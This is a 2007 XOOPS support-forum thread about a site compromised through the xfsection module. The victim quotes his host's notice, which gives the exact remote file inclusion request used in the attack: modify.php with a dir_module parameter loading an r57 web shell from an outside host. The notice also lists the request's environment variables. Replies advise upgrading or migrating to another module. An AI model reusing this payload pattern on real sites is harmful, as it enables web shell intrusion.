xfsection was hacked [Module troubleshooting] - XOOPS Web Application System

1

xfsection was hacked

2007/5/29 10:19
jimbofoxman
Quite a regular
Posts: 292
Since: 2005/4/1 1

I was running 1.07 and I see there is a security update for it , ver 1.11. It was an active module, just not used or visible from the site.

Quote:

We need to inform you that your hosting account for farmngarden.com has been hacked and used to run illegal software on the server.

To prevent further abuse of your account and the server, we have disabled the following location on your account:

/www/www//modules/xfsection

Here is how the hackers have exploited your account:

http://www.farmngarden.com//modules/xfsection/modify.php?dir_module=http://www.revitalizemassage.com/xpl/r57??

Please check the environmental variables of the process for your user:

PATH=/usr/local/bin:/usr/bin:/bin

CONTENT_LENGTH=108

CONTENT_TYPE=application/x-www-form-urlencoded

DOCUMENT_ROOT=/home/farmngar/www/www

HTTP_ACCEPT=image/gif,

HTTP_ACCEPT_ENCODING=gzip,

HTTP_ACCEPT_LANGUAGE=pt-br

HTTP_CACHE_CONTROL=no-cache

HTTP_CONNECTION=Keep-Alive

HTTP_COOKIE=PHPSESSID=8e826cc35162383394cdb7b917a626f1;

HTTP_HOST=www.farmngarden.com

HTTP_REFERER=http://www.farmngarden.com//modules/xfsection/modify.php?dir_module=http://www.revitalizemassage.com/xpl/r57??

HTTP_USER_AGENT=Mozilla/4.0

REMOTE_ADDR=200.175.81.60

REMOTE_PORT=61272

SCRIPT_FILENAME=/home/farmngar/www/www//modules/xfsection/modify.php

SERVER_ADDR=216.35.196.92

SERVER_ADMIN=admin@farmngarden.com

SERVER_NAME=www.farmngarden.com

SERVER_PORT=80

SERVER_SOFTWARE=Apache

GATEWAY_INTERFACE=CGI/1.1

SERVER_PROTOCOL=HTTP/1.1

REQUEST_METHOD=POST

QUERY_STRING=dir_module=http://www.revitalizemassage.com/xpl/r57??

REQUEST_URI=//modules/xfsection/modify.php?dir_module=http://www.revitalizemassage.com/xpl/r57??

SCRIPT_NAME=//modules/xfsection/modify.php

2

Re: xfsection was hacked

2007/5/29 11:53
Anonymous
Posts: 0
Since:

Try to upgrade to xfsection v1.12a

3

Re: xfsection was hacked

2007/5/29 14:22
McDonald
Home away from home
Posts: 1072
Since: 2005/8/15

Not sure but I think the development of XF-Sections has stopped.
1.12 is latest and last.

Happy Linux:
Quote:

XFsection's development is finished in this version (v1.12a).

4

Re: xfsection was hacked

2007/5/29 16:20
irmtfan
Module Developer
Posts: 3419
Since: 2003/12/7

i suggest and also recommend importing xfsection to smartsection or article ( by phppp). both import scripts are fully tested.

Ready for Romance
First Persian Harry Potter Site(English added) | Persian Support Site | Xoops Persian Project

5

Re: xfsection was hacked

2007/5/29 19:38
Anonymous
Posts: 0
Since:

Moving to smartsection is good idea .. I will test this converter in my site.

6

Re: xfsection was hacked

2007/5/29 19:55
Anonymous
Posts: 0
Since:

Hi irmtfan,

I install smartsection 2.13 now but when I click on import I got this message:

As no other supported article module are installed on this site, no article can be imported.

my xfsection is 1.12a ! any help ?

7

Re: xfsection was hacked

2007/5/29 20:06
Anonymous
Posts: 0
Since:

Hi,

I test this converter from ohwada ( xfsection programmer ) and it's working fine:

http://smartfactory.ca/modules/wfdownloads/singlefile.php?cid=18&lid=69

Stats
Goal:	$100.00
Due Date:	Nov 30
Gross Amount:	$0.00
Net Balance:	$0.00
Left to go:	$100.00

xfsection was hacked

Re: xfsection was hacked

Re: xfsection was hacked

Re: xfsection was hacked

Re: xfsection was hacked

Re: xfsection was hacked

Re: xfsection was hacked

Login

Search

Recent Posts

Re: Privacy

Privacy

XOOPS MyMenus 1.54.0 Beta 10

Re: XOOPS MyMenus 1.54.0 Beta 7

Re: XOOPS MyMenus 1.54.0 Beta 7

Re: XOOPS MyMenus 1.54.0 Beta 7

Re: XOOPS MyMenus 1.54.0 Beta 7

Re: XOOPS MyMenus 1.54.0 Beta 7

Re: XOOPS MyMenus 1.54.0 Beta 7

Re: XOOPS MyMenus 1.54.0 Beta 7

Who's Online

Donat-O-Meter

Latest GitHub Commits

{{ record.sha.slice(0, 7) }} - {{ record.commit.message | truncate }}